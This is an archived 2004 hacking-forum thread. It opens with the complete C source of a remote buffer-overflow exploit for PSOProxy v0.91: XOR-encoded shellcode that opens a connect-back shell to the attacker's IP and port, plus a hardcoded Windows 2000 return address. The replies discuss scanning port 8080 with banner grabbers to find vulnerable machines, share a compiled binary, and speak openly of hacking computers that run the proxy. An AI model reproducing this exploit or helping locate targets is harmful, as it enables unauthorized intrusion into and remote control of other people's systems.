Psoproxy V0.91 Remote Sploit By Kralor

Full Version: Psoproxy V0.91 Remote Sploit By Kralor

GovernmentSecurity.org > The Archives > Exploit Articles

Feuerstein

Feb 22 2004, 02:21 PM

from Corumputer

Anyone ideas for scanning this ?

CODE

/******************************************************************/
/* [Crpt] PSOProxy v0.91 remote sploit by kralor [Crpt] */
/******************************************************************/
/* (filtered) eEye */
/* (filtered) private exploits */
/* in other words, (filtered) you all security money makers and */
/* private exploits exchangers. */
/* lolo xXx thanks for errr.. she knows why =) */
/* 30min debugging/coding "hobbie"..no universal 'jmp esp' addr.. */
/******************************************************************/
/*informations: www.coromputer.net,irc undernet #coromputer */
/******************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>

#pragma comment (lib,"ws2_32")

#define PORT 8080

#define RET_POS 1024

#define SIZE 1935

#define RET_ADDR 0x77E729E3 // win2k pro fr sp3

// sequence of 4 opcodes
#define HOP 0xd4 // host opcode
#define POP 0xd7 // port opcode

int cnx(char *host, int port)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;

sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons((u_short)port);

if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}

void syntax(char *prog)
{
printf("syntax: %s <host> <your_ip> <your_port>\r\n",prog);
exit(0);
}

void banner(void)
{
printf("\r\n\t [Crpt] PSOProxy v0.91 remote sploit by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}

int main(int argc, char *argv[])
{
WSADATA wsaData;
int sock;
char useme[SIZE];
unsigned long host,port;
unsigned int i;
char shellc0de[] = /* sizeof(shellc0de+xorer) == 333 bytes */
/* classic xorer */
"\x90" // 0xcc (breakpoint) for debug :P
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
"\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
/* shellc0de */
"\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
"\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
"\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
"\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
"\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
"\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
"\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
"\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
"\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
"\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
"\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
"\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
"\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
"\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
"\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
"\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
"\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
"\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
"\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
"\x57\x91\x95";

banner();
if(argc!=4)
syntax(argv[0]);
host=inet_addr(argv[2])^0x95959595;
port=atoi(argv[3]);
if(port<=0||port>65535) {
printf("error: <port> must be between 1 and 65535\r\n");
return -1;
}
port=htons((unsigned short)port);
port=port<<16;
port+=0x0002;
port=port^0x95959595;

for(i=0;i<sizeof(shellc0de);i++) {
if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
memcpy(&shellc0de[i],&host,4);
host=0;
}
if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
memcpy(&shellc0de[i],&port,4);
port=0;
}
}
if(host||port) {
printf("error: unabled to find ip/port sequence in shellc0de\r\n");
return -1;
}

if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}

sock=cnx(argv[1],PORT);
if(!sock)
return -1;
memset(useme,0x90,SIZE);
memcpy(&useme[1132],shellc0de,sizeof(shellc0de)-1);
*(unsigned long*)&useme[RET_POS] = RET_ADDR; // eip pointing to jmp esp...
printf("[+] Sending magic string ...");
send(sock,useme,sizeof(useme),0);
send(sock,"\r\n",2,0);
closesocket(sock);
printf("Done\r\n");
return 0;
}

dragonfly

Feb 22 2004, 02:38 PM

#define PORT 8080

hope this works

Reclone

Feb 22 2004, 02:38 PM

When looking at the code it says port 8080.
That will give you a lot of useless results so maby use a banner grabber

dragonfly

Feb 22 2004, 02:39 PM

me was first reclone hehehe but indeed try a banner grabber

Feuerstein

Feb 22 2004, 02:40 PM

y0 that was my intention

im in the need of the banner, this proxy gives us. im sure im able to write us a scanner then

s54

Feb 22 2004, 04:02 PM

Good luck finding and hacking computers with that one running

Feuerstein

Feb 22 2004, 04:33 PM

QUOTE (s54 @ Feb 22 2004, 06:02 PM)

Good luck finding and hacking computers with that one running

hehe, i think they are more rare than the imail ones

TheOther

Feb 22 2004, 04:34 PM

Feuerstein,

I'll install the proxy to see what the banner is. You write the banner checker?

TheOther

Feb 22 2004, 04:38 PM

Don't think that this exploit is usefull:

PSOProxy is a program that lets you transfer your Phantasy Star Online snapshot files from your Gamecube to your PC as PNG picture files.

The latest version of PSOProxy is version 0.91.

dragonfly

Feb 22 2004, 05:12 PM

hm so not many ppl has it

2 bad =)

Feuerstein

Feb 22 2004, 05:49 PM

QUOTE (dragonfly @ Feb 22 2004, 07:12 PM)

hm so not many ppl has it

2 bad =)

thats the point, but: y0, TheOther, i will, but for win only

Alien

Feb 22 2004, 06:46 PM

compiled this with any errors

here is compiled ver.

Siliconized

Feb 22 2004, 07:27 PM

Indeed this xploit even if it wasn't rare if u scan for port 8080 u'll find many results that very few of them might be this.
So with a banner checker also it will take some time and i'm not sure about the results

But anyway yet another one from kralor

Major Chrome

Feb 23 2004, 05:15 AM

I'm gonna give this a go and see what I find, most likely going to be useless things, but nice to know all the less.

Sedolf

Feb 23 2004, 06:16 AM

Lol then go find some french people with a gamecube and win2k

Leonnetje

Feb 23 2004, 01:32 PM

QUOTE (Major Chrome @ Feb 23 2004, 05:15 AM)

I'm gonna give this a go and see what I find, most likely going to be useless things, but nice to know all the less.

Good luck....

I've tried some scanning on it, but it's far from vulnerable

Major Chrome

Feb 23 2004, 09:23 PM

I've found nothing either, oh well, was worth a go.

DvilleStoner

Feb 26 2004, 09:28 AM

any scanner for this out yet?

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.